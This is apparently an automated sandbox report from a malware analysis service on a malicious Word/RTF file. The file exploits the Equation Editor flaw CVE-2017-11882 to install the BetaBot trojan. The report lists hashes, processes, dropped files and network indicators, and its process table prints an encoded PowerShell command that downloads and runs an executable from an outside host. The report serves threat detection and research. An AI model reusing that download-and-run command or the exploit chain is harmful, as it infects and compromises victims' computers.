analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NJ-06424209.doc

Full analysis: https://app.any.run/tasks/5e71bfb0-49b9-4aa0-aee1-2b37a8043420
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 10:45:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
loader
trojan
betabot
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

6A8BD2554A4E06EE6CF6E77D6E7102C6

SHA1:

73D96768972054DC1B5415C1BFEE630FF9D1F7B2

SHA256:

7D06CF2415DCFC88B455F2A82749C87BFA91F90503589D75991C0E00EC2EC4FC

SSDEEP:

48:acSSebGDvTzDXi5xokbzjEsTl9en2HwDEEEEEEEEEEk:acSSCGDvrSxJFxo2sEEEEEEEEEEk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2796)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3612)
    • Loads dropped or rewritten executable

      • nvbackend.exe (PID: 1336)
    • Application was dropped or rewritten from another process

      • nvbackend.exe (PID: 1336)
      • nslookup.exe (PID: 3112)
    • Detected BetaBot Trojan

      • nslookup.exe (PID: 3112)
      • WINWORD.EXE (PID: 3604)
      • explorer.exe (PID: 3276)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 3276)
    • Changes internet zones settings

      • explorer.exe (PID: 3276)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • EQNEDT32.EXE (PID: 2796)
    • Executed via COM

      • EQNEDT32.EXE (PID: 2796)
    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 2796)
      • powershell.exe (PID: 3612)
    • Reads internet explorer settings

      • EQNEDT32.EXE (PID: 2796)
    • Executed via WMI

      • cmd.exe (PID: 1472)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3612)
      • nslookup.exe (PID: 3112)
      • nvbackend.exe (PID: 1336)
      • explorer.exe (PID: 3276)
    • Creates files in the program directory

      • nslookup.exe (PID: 3112)
      • explorer.exe (PID: 3276)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3604)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #BETABOT winword.exe no specs eqnedt32.exe powershell.exe cmd.exe no specs nvbackend.exe #BETABOT nslookup.exe #BETABOT explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
3604"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NJ-06424209.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2796"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3612"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAGEAcwBpAGEALQBrAHUAbgBzAHQAaABhAG4AZAB3AGUAYQAxAC0AbwBuAGwAaQBuAGUALgBjAG8AbQAvAGMAcwAvAGYAZQBtAGkALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAG4AdgBiAGEAYwBrAGUAbgBkAC4AZQB4AGUAIgApACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1472cmd /c %temp%\nvbackend.exeC:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1336C:\Users\admin\AppData\Local\Temp\nvbackend.exeC:\Users\admin\AppData\Local\Temp\nvbackend.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3112"C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe
nvbackend.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3276C:\Windows\explorer.exeC:\Windows\explorer.exe
nslookup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 716
Read events
1 253
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
4
Text files
3
Unknown types
3

Dropped files

PID
Process
Filename
Type
3604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3EB2.tmp.cvr
MD5:
SHA256:
3612powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MX8BJX5DIPX232R4GYUZ.temp
MD5:
SHA256:
1336nvbackend.exeC:\Users\admin\AppData\Local\Temp\nsmA879.tmp
MD5:
SHA256:
3604WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{821F0AE7-B10F-47AA-98F8-926D7A97D8A7}.tmp
MD5:
SHA256:
3604WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{724A7071-CD0C-4CCC-9570-5104A8B83D59}.tmp
MD5:
SHA256:
1336nvbackend.exeC:\Users\admin\AppData\Local\Temp\ThemeChangingControl.xbfxbf
MD5:01336DE922C096332F61102148698D6B
SHA256:3E347A32B9B1E7252AF5E3420E273AE6D0EB5F1AB49B53188968E5FD15507182
3612powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF139c24.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1336nvbackend.exeC:\Users\admin\AppData\Local\Temp\45.rsrcimage
MD5:9FA0AB9747938C946123591714C493F2
SHA256:0596ED18892EFD67876AAE438AFF0264EE7704533CB0ABCBDB9482EDE4FE3B06
3604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$-06424209.docpgc
MD5:A398C7877CA15DB418A50583D5F487E2
SHA256:A6E72461BB3A76FB157AA3944EEA92D10877EFFD57468A0DD02CD261E3201BC6
3604WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:FC364354350804BC97FCC9AEF07F32AD
SHA256:92F1088DD2889EF5A10207CF69EE4CBB09EE8339CF991F0014322B6A82C5C463
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
4
DNS requests
53
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3612
powershell.exe
GET
200
13.211.163.49:80
http://asia-kunsthandwea1-online.com/cs/femi.exe
AU
executable
371 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3276
explorer.exe
13.77.161.179:80
microsoft.com
Microsoft Corporation
US
whitelisted
2796
EQNEDT32.EXE
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
3612
powershell.exe
13.211.163.49:80
asia-kunsthandwea1-online.com
Amazon.com, Inc.
AU
suspicious
2796
EQNEDT32.EXE
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
dns.msftncsi.com
  • 131.107.255.255
shared
asia-kunsthandwea1-online.com
  • 13.211.163.49
suspicious
microsoft.com
  • 13.77.161.179
  • 40.76.4.15
  • 40.112.72.205
  • 40.113.200.201
  • 104.215.148.63
whitelisted
kkrudy.com
unknown

Threats

PID
Process
Class
Message
3612
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3612
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info